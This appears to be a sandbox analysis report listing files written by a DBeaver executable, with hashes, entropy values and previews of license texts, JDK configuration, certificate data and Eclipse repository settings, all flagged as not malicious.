      SHA-256:5A4BD51B969BF187FF86D94F4A71FDFBFA602762975FA3C73D264B4575F7C78F
      SHA-512:8124B25DECFA64A65433FF2CE1F0F7BDF304ABE2997568ABC35264A705F07152AA993B543DA37C4132B4B1B606743C825C90A0EB17B268518D478F5CF0889062
      Malicious:false
      Reputation:unknown
      Preview:#.#.# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved..# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER..#.# This code is free software; you can redistribute it and/or modify it.# under the terms of the GNU General Public License version 2 only, as.# published by the Free Software Foundation. Oracle designates this.# particular file as subject to the "Classpath" exception as provided.# by Oracle in the LICENSE file that accompanied this code..#.# This code is distributed in the hope that it will be useful, but WITHOUT.# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or.# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License.# version 2 for more details (a copy is included in the LICENSE file that.# accompanied this code)..#.# You should have received a copy of the GNU General Public License version.# 2 along with this work; if not, write to the Free Software Foundation,.# Inc., 51 Franklin St, Fifth Floor, B
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11390
      Entropy (8bit):5.012862319190609
      Encrypted:false
      SSDEEP:
      MD5:17B15D370018ACC01550175882C7DA91
      SHA1:4EDD9E0FC3D30FBDCABCDCAAB3BC0B3157FC881E
      SHA-256:780C565D5AF3EE6F68B887B75C041CDF46A0592F67012F12EEB691283E92630A
      SHA-512:E4EE92D4598385CB2F6F3A4DB91DDABD7E615DC105ED26CDC5B5598D01C526CEA7726FF93F92A308350229F2E5A5DD64CC0C38865DD97666368A330B410D4892
      Malicious:false
      Reputation:unknown
      Preview:#.#.# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved..# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER..#.# This code is free software; you can redistribute it and/or modify it.# under the terms of the GNU General Public License version 2 only, as.# published by the Free Software Foundation. Oracle designates this.# particular file as subject to the "Classpath" exception as provided.# by Oracle in the LICENSE file that accompanied this code..#.# This code is distributed in the hope that it will be useful, but WITHOUT.# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or.# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License.# version 2 for more details (a copy is included in the LICENSE file that.# accompanied this code)..#.# You should have received a copy of the GNU General Public License version.# 2 along with this work; if not, write to the Free Software Foundation,.# Inc., 51 Franklin St, Fifth Floor, Boston,
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):2527
      Entropy (8bit):4.141598882390435
      Encrypted:false
      SSDEEP:
      MD5:8273F70416F494F7FA5B6C70A101E00E
      SHA1:AEAEBB14FBF146FBB0AAF347446C08766C86CA7F
      SHA-256:583500B76965EB54B03493372989AB4D3426F85462D1DB232C5AE6706A4D6C58
      SHA-512:E697A57D64ACE1F302300F83E875C2726407F8DAF7C1D38B07AB8B4B11299FD698582D825BEE817A1AF85A285F27877A9E603E48E01C72E482A04DC7AB12C8DA
      Malicious:false
      Reputation:unknown
      Preview:Algorithm=SHA-256..03DB9E5E79FE6117177F81C11595AF598CB176AF766290DBCEB2C318B32E39A2..08C396C006A21055D00826A5781A5CCFCE2C8D053AB3C197637A4A7A5BB9A650..14E6D2764A4B06701C6CBC376A253775F79C782FBCB6C0EE6F99DE4BA1024ADD..1C5E6985ACC09221DBD1A4B7BBC6D3A8C3F8540D19F20763A9537FDD42B4FFE7..1F6BF8A3F2399AF7FD04516C2719C566CBAD51F412738F66D0457E1E6BDE6F2D..2A464E4113141352C7962FBD1706ED4B88533EF24D7BBA6CCC5D797FD202F1C4..31C8FD37DB9B56E708B03D1F01848B068C6DA66F36FB5D82C008C6040FA3E133..3946901F46B0071E90D78279E82FABABCA177231A704BE72C5B0E8918566EA66..3E11CF90719F6FB44D94EAC9A156B89BEBE7B8598F28EC58913F2BFCAF91D0C0..423279423B9FC8CB06F1BB7C3B247522B948D5F18939F378ECC901126DE40BFB..450F1B421BB05C8609854884559C323319619E8B06B001EA2DCBB74A23AA3BE2..4CBBF8256BC9888A8007B2F386940A2E394378B0D903CBB3863C5A6394B889CE..4FEE0163686ECBD65DB968E7494F55D84B25486D438E9DE558D629D28CD4D176..535D04DFCE027C70BD5F8A9E0AD4F218E9AFDCF5BBCF9B6DE0D81E148E2E3172..568FAF38D9F155F624838E2181B1CEB4D8459305EE652B0F810C97C36
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java KeyStore
      Category:dropped
      Size (bytes):165529
      Entropy (8bit):7.626603820759516
      Encrypted:false
      SSDEEP:
      MD5:F0A2CB3FE17CE623F57E091E40D2A8C3
      SHA1:85779AB4230CF7027F9AF8A8C28C96C95F0C5C1F
      SHA-256:95F8FA310F8B8151784AF56CD4BD08392F421EDC46A03A1157BA3A92FA442623
      SHA-512:68408030CED18FAFC6583673D63BF43F4B9FE375C16A20B097706939A45F82ECBDFDD96B0AD256DB88FBD00459B3702398464E1279D0112B031C1B6ED71ADA51
      Malicious:false
      Reputation:unknown
      Preview:.................?c__at,_o__ecommerce_monitoring_gmbh,_cn__globaltrust_2020 [jdk]...p,eH...X.509....0...0..j.......ZK.Z.O.[.e.0...*.H........0M1.0...U....AT1#0!..U....e-commerce monitoring GmbH1.0...U....GLOBALTRUST 20200...200210000000Z..400610000000Z0M1.0...U....AT1#0!..U....e-commerce monitoring GmbH1.0...U....GLOBALTRUST 20200.."0...*.H.............0..........V........w.+.c..ME...[E.Y{Q4..x..k....E...8.....As...Q..;s8nw..Yc&.*.T....|G.`|?.s.......5..(....c>...|^..P.8.Ac...i.h..6.....K.1......V.4...,...c.....)......-.G....:".(W.....(..}.*B;..c.c...|.f...m7o.~.Q.E....$Rd..H.N..""0.....@.B..Q..~.D.Ca.k..I...+...x.h...z6.o...wI....r..S.... J.'.&+G.i......k..^|.$.G)i;n..@...qq+..X..A."...9.'......F..t:...n,..1\;F.{..V^....e.....bE. .Fp......t.l.,.......rS..`F.j..C.p w.7AyURc.[...h....0...1.g....l.s.$.k...7I.....lII-.....AJy!%.c...~Bi.:c......c0a0...U.......0....0...U...........0...U..........a7y....qh=jh."0...U.#..0.......a7y....qh=jh."0...*.H...........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):10735
      Entropy (8bit):4.693655625183127
      Encrypted:false
      SSDEEP:
      MD5:A9BC877EB282751FA4832811BD5FD922
      SHA1:F2B41D0C2C4F708F4C8B4561FF4E42C3875D9903
      SHA-256:A06DB9C282547150E85E7A67590726F112BBDA9305371907C7082215B7D13B5C
      SHA-512:35A1BDF6B24BB5BA0ECB7585454F607E0AA5746DAE8921A49C9DA3644CC309EE21FF85DE34E0861E835E12B2EA4C0E501A1551F081F21D8493C884660C5862DF
      Malicious:false
      Reputation:unknown
      Preview://.// Permissions required by modules stored in a run-time image and loaded.// by the platform class loader..//.// NOTE that this file is not intended to be modified. If additional.// permissions need to be granted to the modules in this file, it is.// recommended that they be configured in a separate policy file or.// ${java.home}/conf/security/java.policy..//...grant codeBase "jrt:/java.compiler" {. permission java.security.AllPermission;.};...grant codeBase "jrt:/java.net.http" {. permission java.lang.RuntimePermission "accessClassInPackage.sun.net";. permission java.lang.RuntimePermission "accessClassInPackage.sun.net.util";. permission java.lang.RuntimePermission "accessClassInPackage.sun.net.www";. permission java.lang.RuntimePermission "accessClassInPackage.jdk.internal.misc";. permission java.lang.RuntimePermission "modifyThread";. permission java.net.SocketPermission "*","connect,resolve";. permission java.net.URLPermission "http:*","*:*";. permissio
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):234080
      Entropy (8bit):5.15519850214153
      Encrypted:false
      SSDEEP:
      MD5:E7A714571A1F7C4E1D2F70B8F3052ADA
      SHA1:2B09124CADDF58EC734F4664264ED5666F7C1C64
      SHA-256:72E17C92D464BA1476FBCC7DAC6CBC493F6FB04F158895368B57D81DDBE277D1
      SHA-512:981250D4DA5FA5F86DAD4FAE8465FD8CE3CF36297A86ECE0FFDFB3963AC5F8E0A56C0AEAB518FACB7B51EC359665F6A0685F2C5443271E70AC8C31C9B1AA01D0
      Malicious:false
      Reputation:unknown
      Preview:PK..........!.................aaaUT.......cHLL....PK..|Yd.........PK..........!.................aarpUT.......cHL,*....PK..h.*:........PK..........!.................abarthUT.......cHLJ,*.....PK....9Q........PK..........!.................abbUT.......cHLJ....PK...H..........PK..........!.................abbottUT.......cHLJ./)....PK.....Z........PK..........!.................abbvieUT.......cHLJ*.L....PK..ht..........PK..........!.................abcUT.......cHLJ....PK..."U.........PK..........!.................ableUT.......cHL.I....PK.............PK..........!.................abogadoUT.......cHL.OOL.....PK..^|.T........PK..........!.................abudhabiUT.......cHL*M.HL.....PK..<...........PK..........!.................acUT.......cHL..bH....3RSJ!...2.#/......0......"0..PK...3..+...D...PK..........!.................academyUT.......cHLNLI...b.OK.L.L.....PK...k;.........PK..........!.................accentureUT.......cHLNN.+)-J....PK.............PK..........!.................accoun
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):102619
      Entropy (8bit):7.149988796288822
      Encrypted:false
      SSDEEP:
      MD5:3D15F6334ECBA68CA785D3A76C7CFE88
      SHA1:FB7EB7F9D96CE45BFA73640DA0DB3F72729907A6
      SHA-256:1D000EB88B91DD063EE4696568B031BB318BA2D659ACC08BF81C05B8F649CC88
      SHA-512:06B88793648F0C627329496BB545F32A6BD22A372F0C8587B52F7BF973B89683FC2756AE6D808E5A40A3993DD448A1C0510A8D708F015D72CFAD6B2D548E5753
      Malicious:false
      Reputation:unknown
      Preview:...TZDB....2022g.[..Africa/Abidjan..Africa/Accra..Africa/Addis_Ababa..Africa/Algiers..Africa/Asmara..Africa/Asmera..Africa/Bamako..Africa/Bangui..Africa/Banjul..Africa/Bissau..Africa/Blantyre..Africa/Brazzaville..Africa/Bujumbura..Africa/Cairo..Africa/Casablanca..Africa/Ceuta..Africa/Conakry..Africa/Dakar..Africa/Dar_es_Salaam..Africa/Djibouti..Africa/Douala..Africa/El_Aaiun..Africa/Freetown..Africa/Gaborone..Africa/Harare..Africa/Johannesburg..Africa/Juba..Africa/Kampala..Africa/Khartoum..Africa/Kigali..Africa/Kinshasa..Africa/Lagos..Africa/Libreville..Africa/Lome..Africa/Luanda..Africa/Lubumbashi..Africa/Lusaka..Africa/Malabo..Africa/Maputo..Africa/Maseru..Africa/Mbabane..Africa/Mogadishu..Africa/Monrovia..Africa/Nairobi..Africa/Ndjamena..Africa/Niamey..Africa/Nouakchott..Africa/Ouagadougou..Africa/Porto-Novo..Africa/Sao_Tome..Africa/Timbuktu..Africa/Tripoli..Africa/Tunis..Africa/Windhoek..America/Adak..America/Anchorage..America/Anguilla..America/Antigua..America/Araguaina..America/
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):22143
      Entropy (8bit):4.978142372450471
      Encrypted:false
      SSDEEP:
      MD5:B02EE240A8DB902961FE886A19BEBA16
      SHA1:C52C42D591F4C650B629E6B374E967E211FB5AEB
      SHA-256:36DC51C4BF787F640A4B45CBB84AB6954F6E595CBD3617C2F5A4E1E607B38BFF
      SHA-512:024811961511B7182860ED03A5670F82412A45D005A1DB0876F6B0C9AF7E96C104566ABFF0EBBDED11A780349444214291F439039D20FB92071C7DD24BDA0E23
      Malicious:false
      Reputation:unknown
      Preview:AUS Central Standard Time:AU:Australia/Darwin:..AUS Central Standard Time:001:Australia/Darwin:..AUS Eastern Standard Time:AU:Australia/Sydney:..AUS Eastern Standard Time:001:Australia/Sydney:..Afghanistan Standard Time:AF:Asia/Kabul:..Afghanistan Standard Time:001:Asia/Kabul:..Alaskan Standard Time:US:America/Anchorage:..Alaskan Standard Time:001:America/Anchorage:..Aleutian Standard Time:US:America/Adak:..Aleutian Standard Time:001:America/Adak:..Altai Standard Time:RU:Asia/Barnaul:..Altai Standard Time:001:Asia/Barnaul:..Arab Standard Time:BH:Asia/Bahrain:..Arab Standard Time:KW:Asia/Kuwait:..Arab Standard Time:QA:Asia/Qatar:..Arab Standard Time:SA:Asia/Riyadh:..Arab Standard Time:YE:Asia/Aden:..Arab Standard Time:001:Asia/Riyadh:..Arabian Standard Time:AE:Asia/Dubai:..Arabian Standard Time:OM:Asia/Muscat:..Arabian Standard Time:ZZ:Etc/GMT-4:..Arabian Standard Time:001:Asia/Dubai:..Arabic Standard Time:IQ:Asia/Baghdad:..Arabic Standard Time:001:Asia/Baghdad:..Argentina Standard Time
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with very long lines (561), with CRLF line terminators
      Category:dropped
      Size (bytes):586
      Entropy (8bit):4.637809373710385
      Encrypted:false
      SSDEEP:
      MD5:D1EA256674F6FA6904465C06F63CAA20
      SHA1:E1EF44873250253E5A96670288D5C9A3C2E8D4FD
      SHA-256:4F0ABE83C4944E51BD7B0833B0DBF245A9EC3F6476E4D169CF89BA4E8EC0CAF0
      SHA-512:FC3EF6A980C89226D581B14F533F782DA350D9FFDD92EC312BA7ACE6F26D46E6693F7A5A10909DD960EB76FA3F918B65327FA08AF3B7EFE26E5E874EA2B2375C
      Malicious:false
      Reputation:unknown
      Preview:JAVA_VERSION="17.0.6"..MODULES="java.base java.compiler java.datatransfer java.xml java.prefs java.desktop java.logging java.management java.security.sasl java.naming java.rmi java.management.rmi java.net.http java.scripting java.security.jgss java.transaction.xa java.sql java.sql.rowset jdk.accessibility jdk.internal.jvmstat jdk.attach jdk.charsets jdk.crypto.ec jdk.crypto.cryptoki jdk.crypto.mscapi jdk.httpserver jdk.jcmd jdk.localedata jdk.management jdk.naming.dns jdk.naming.rmi jdk.net jdk.security.auth jdk.security.jgss jdk.unsupported jdk.unsupported.desktop jdk.xml.dom"..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):11560
      Entropy (8bit):4.476377058372447
      Encrypted:false
      SSDEEP:
      MD5:D273D63619C9AEAF15CDAF76422C4F87
      SHA1:47B573E3824CD5E02A1A3AE99E2735B49E0256E4
      SHA-256:3DDF9BE5C28FE27DAD143A5DC76EEA25222AD1DD68934A047064E56ED2FA40C5
      SHA-512:4CC5A12BFE984C0A50BF7943E2D70A948D520EF423677C77629707AACE3A95AA378D205DE929105D644680679E70EF2449479B360AD44896B75BAFED66613272
      Malicious:false
      Reputation:unknown
      Preview:.. Apache License.. Version 2.0, January 2004.. http://www.apache.org/licenses/.... TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.... 1. Definitions..... "License" shall mean the terms and conditions for use, reproduction,.. and distribution as defined by Sections 1 through 9 of this document..... "Licensor" shall mean the copyright owner or entity authorized by.. the copyright owner that is granting the License..... "Legal Entity" shall mean the union of the acting entity and all.. other entities that control, are controlled by, or are under common.. control with that entity. For the purposes of this definition,.. "control" means (i) the power, direct or indirect, to cause the.. direction or management of such entity, whether by contract or.. otherwise, or (ii) ownership of fifty percent (50%) or more of the.. outstanding shares, or
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):10351
      Entropy (8bit):4.440581493706955
      Encrypted:false
      SSDEEP:
      MD5:29256199BE2A609AAC596980FFC11996
      SHA1:BD0B945D001AEBC12DD7CDBF100427F1BC8D6957
      SHA-256:EB3D7B5485466ACBD81F2B496F595AB637D2792E268206B27D99E793BDB67549
      SHA-512:2504A54FC7C2C0E2B32EFC2BD7B3B8D65B15D78869740195B39EBE4073F8A2CD3EA3A3FEBCC7CC4E38121A62C6A8364A90764FA595C50313C51129E5890D479C
      Malicious:false
      Reputation:unknown
      Preview:.. Apache License.. Version 2.0, January 2004.. http://www.apache.org/licenses/.... TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.... 1. Definitions..... "License" shall mean the terms and conditions for use, reproduction,.. and distribution as defined by Sections 1 through 9 of this document..... "Licensor" shall mean the copyright owner or entity authorized by.. the copyright owner that is granting the License..... "Legal Entity" shall mean the union of the acting entity and all.. other entities that control, are controlled by, or are under common.. control with that entity. For the purposes of this definition,.. "control" means (i) the power, direct or indirect, to cause the.. direction or management of such entity, whether by contract or.. otherwise, or (ii) ownership of fifty percent (50%) or more of the.. outstanding shares, or
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):8951
      Entropy (8bit):5.0763481466767315
      Encrypted:false
      SSDEEP:
      MD5:3A09DDA261DD572C85211D03AE12388E
      SHA1:8FFA26D9312A2BCE39093FDF58382C08EF4D963E
      SHA-256:D9F0E12FD3CB806DDFD99A5ADB92D66DEDF6C737CDE5AF7EB5D829C85F29AFBA
      SHA-512:18086CA6C3FFB1DC9EF9F49DEC87E7C22902CBEA6BAEDC6C97A2AB015A0A5FE974B02371D35527CFF7616B7BA2C44752BD02D550F91148378328E5E724C226C6
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml"><head>....<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">.<title>Eclipse Foundation Software User Agreement</title>.</head><body lang="EN-US">.<h2>Eclipse Foundation Software User Agreement</h2>.<p>February 1, 2011</p>..<h3>Usage Of Content</h3>..<p>THE ECLIPSE FOUNDATION MAKES AVAILABLE SOFTWARE, DOCUMENTATION, INFORMATION AND/OR OTHER MATERIALS FOR OPEN SOURCE PROJECTS. (COLLECTIVELY "CONTENT"). USE OF THE CONTENT IS GOVERNED BY THE TERMS AND CONDITIONS OF THIS AGREEMENT AND/OR THE TERMS AND. CONDITIONS OF LICENSE AGREEMENTS OR NOTICES INDICATED OR REFERENCED BELOW. BY USING THE CONTENT, YOU AGREE THAT YOUR USE. OF THE CONTENT IS GOVERNED BY THIS AGREEMENT AND/OR THE TERMS AND CONDITIONS OF ANY APPLICABLE LICENSE AGREEMENTS OR. NOTICES INDICATED OR REFERENCED BELOW. IF YOU DO NOT AGREE TO THE TERMS
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11356
      Entropy (8bit):4.42647140717072
      Encrypted:false
      SSDEEP:
      MD5:2B42EDEF8FA55315F34F2370B4715CA9
      SHA1:58853EB8199B5AFE72A73A25FD8CF8C94285174B
      SHA-256:43070E2D4E532684DE521B885F385D0841030EFA2B1A20BAFB76133A5E1379C1
      SHA-512:42EDF58252A01B5858E6CC3C5A1A29BBCDF1295351B6A4383883A189499EC3C1A64CD5F2F6498A9385E85AF21732C65AFA866A8371AFB4BF843F4E8BD38A7A73
      Malicious:false
      Reputation:unknown
      Preview: Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial owne
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1651
      Entropy (8bit):5.166588632351824
      Encrypted:false
      SSDEEP:
      MD5:8929266AB4293B5418945F1D57214737
      SHA1:D8FA262C22069AA286177D64BFB95255FEEEC8B6
      SHA-256:857F25DA28B0B581012DBD330181D6DEA421EE4F8F3945ED21F6C1462B454045
      SHA-512:2FFD145AA735F3E1DF91398B927B5943392D3839B7DD115066BD2F8337476241567E32ACAD58F6EDB8955BD75ABE4582AFE519D849EF8CE9AFD1AD249807B1BB
      Malicious:false
      Reputation:unknown
      Preview:JSch 0.0.* was released under the GNU LGPL license. Later, we have switched .over to a BSD-style license. ..------------------------------------------------------------------------------.Copyright (c) 2002-2012 Atsuhiko Yamanaka, JCraft,Inc. .All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright . notice, this list of conditions and the following disclaimer in . the documentation and/or other materials provided with the distribution... 3. The names of the authors may not be used to endorse or promote products. derived from this software without specific prior written permission...THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED WARRANTIES,.INC
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11356
      Entropy (8bit):4.42647140717072
      Encrypted:false
      SSDEEP:
      MD5:DC7F21CCFF0F672F2A7CD6F412AE627D
      SHA1:81FD98AE93FD5E0A79EBCA20EC8881478FE402A8
      SHA-256:C5ACCBBD8546E94C34AED24AFE689A617627D18EED5A6C48277E48DB57C23851
      SHA-512:71D2B28A4D77CABAEB07B0D8622404AA5738F1E22FE48F6D4AD1C5D1F191DC3C7EFC0D471A1AE3618D75862379162157CABF3ABF8C21C4D3B7154A1DFA99CFA8
      Malicious:false
      Reputation:unknown
      Preview: Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial owne
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1068
      Entropy (8bit):5.0976285639715195
      Encrypted:false
      SSDEEP:
      MD5:3914388ED65427D749C0C5886D2D12CF
      SHA1:EDE5B6DC92865C7AD5406FF9D468F53FFB092101
      SHA-256:A406579CD136771C705C521DB86CA7D60A6F3DE7C9B5460E6193A2DF27861BDE
      SHA-512:495662F2CC07E0F6DEBA53CCC0E2EE9A29AC63A5BFB6BD9B7DA4A08ED2DA8090EA2A080D63C21EE7BA74A9468D5EB8828B258FE3BE7AE9D0DBE42931A261E3AF
      Malicious:false
      Reputation:unknown
      Preview:MIT License..Copyright (c) [year] [fullname]..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNEC
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with very long lines (946)
      Category:dropped
      Size (bytes):9135
      Entropy (8bit):4.552007907963255
      Encrypted:false
      SSDEEP:
      MD5:715EB27DDEE451C08C2E6F682C0F0593
      SHA1:0A57C130A2512C1ABAAAF683AE1F3FC8BE2F75C8
      SHA-256:D8DDD6435EAE4D5E7DF65248F19A347FCF67E2D454D0826CB418A33648E2DD54
      SHA-512:9540F48D8879CA69538F8BC0039B1C422EFA98D94C5E8EE2180EF14BB7762B99634D9124F8450DB5466B193E56E323FE96F057CF444C0B64561D4F5717B07A79
      Malicious:false
      Reputation:unknown
      Preview:Apache License.Version 2.0, January 2004.http://www.apache.org/licenses/..TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION..1. Definitions..."License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document..."Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License..."Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity..."You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License..."Source" form shall mean
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11634
      Entropy (8bit):4.432287954054063
      Encrypted:false
      SSDEEP:
      MD5:F0EC30F2F877C45C15275E2C6751EBCA
      SHA1:8A35DDA71234C427A1018B2A9397C70CACE50537
      SHA-256:C16C0C323C2A71D0ADD8B06E464AA1CD654C91793E8AB23B81F4F1C79A7C1383
      SHA-512:3227DD98F4228DBEC2F4A91B6E1547FE419E083232EF761E4D486DD86A4785F28BB0A92220191F27C305DB704E457B31413488871C3E6EA765C57AF900D046AB
      Malicious:false
      Reputation:unknown
      Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with very long lines (348)
      Category:dropped
      Size (bytes):135985
      Entropy (8bit):4.615485281203737
      Encrypted:false
      SSDEEP:
      MD5:1AC3B86B9CDD172BED1A986AB37926B4
      SHA1:B8907C1D99791C8CC76F39575F34392926AEAF49
      SHA-256:3E4040A5A2A7D9D801A5AB0A5830310E8B5E3BE26094C28A4280A699E066DC2E
      SHA-512:7D914F3CC37E58B5D3D2C31D749DA6DE98E1FEA0C1E48C2328366900E8AC64963551EECA60D36040D79FF044A5F8857B3940A5CB89BFDFE4DE4CC83F9EE7E6F2
      Malicious:false
      Reputation:unknown
      Preview:eclipse.preferences.version=1.repositories/file\:_home_jenkins_.m2_repository/description=.repositories/file\:_home_jenkins_.m2_repository/enabled=true.repositories/file\:_home_jenkins_.m2_repository/isSystem=false.repositories/file\:_home_jenkins_.m2_repository/provider=.repositories/file\:_home_jenkins_.m2_repository/suffix=.meta/p2-artifacts.properties.repositories/file\:_home_jenkins_.m2_repository/uri=file\:/home/jenkins/.m2/repository/.repositories/file\:_resolution-context-artifacts@%252Fvar%252Fjenkins_home%252Fjobs%252FDBeaverDesktop%252Fjobs%252Fdbeaver-ce%252Fworkspace%252Fdbeaver%252Fproduct%252Fcommunity/description=Read-only repository adapter for org.eclipse.tycho.p2.repository.CompositeArtifactProvider@519a7e23.repositories/file\:_resolution-context-artifacts@%252Fvar%252Fjenkins_home%252Fjobs%252FDBeaverDesktop%252Fjobs%252Fdbeaver-ce%252Fworkspace%252Fdbeaver%252Fproduct%252Fcommunity/enabled=true.repositories/file\:_resolution-context-artifacts@%252Fvar%252Fjenkins_h
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):3075
      Entropy (8bit):4.57829707566654
      Encrypted:false
      SSDEEP:
      MD5:4873714333A16E217A11E650E56938FF
      SHA1:904F4BF0B4416D46983F7415F51E56BA2241DB8E
      SHA-256:5455BF7FD69C388D9684DE00755FB5C74CAEAEE6FDAB7FA558E731A58F0A7C5B
      SHA-512:07A5D5E8946877780A905F00BF7C61E0878F61E567328D0968E4D8A2BEEC242D2AA26DE7CFE73AD0BE8DE60E9234334F982E1403F68F285B1BE95C9A341D633B
      Malicious:false
      Reputation:unknown
      Preview:eclipse.preferences.version=1.repositories/https\:__dbeaver.io_update_ai_latest/count=1.repositories/https\:__dbeaver.io_update_ai_latest/enabled=true.repositories/https\:__dbeaver.io_update_ai_latest/isSystem=false.repositories/https\:__dbeaver.io_update_ai_latest/nickname=DBeaver AI (GPT) integration.repositories/https\:__dbeaver.io_update_ai_latest/uri=https\://dbeaver.io/update/ai/latest.repositories/https\:__dbeaver.io_update_ce_latest/count=1.repositories/https\:__dbeaver.io_update_ce_latest/enabled=true.repositories/https\:__dbeaver.io_update_ce_latest/isSystem=false.repositories/https\:__dbeaver.io_update_ce_latest/nickname=DBeaver CE update site.repositories/https\:__dbeaver.io_update_ce_latest/uri=https\://dbeaver.io/update/ce/latest.repositories/https\:__dbeaver.io_update_debug_latest/count=1.repositories/https\:__dbeaver.io_update_debug_latest/enabled=true.repositories/https\:__dbeaver.io_update_debug_latest/isSystem=false.repositories/https\:__dbeaver.io_update_debug_lates
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2535
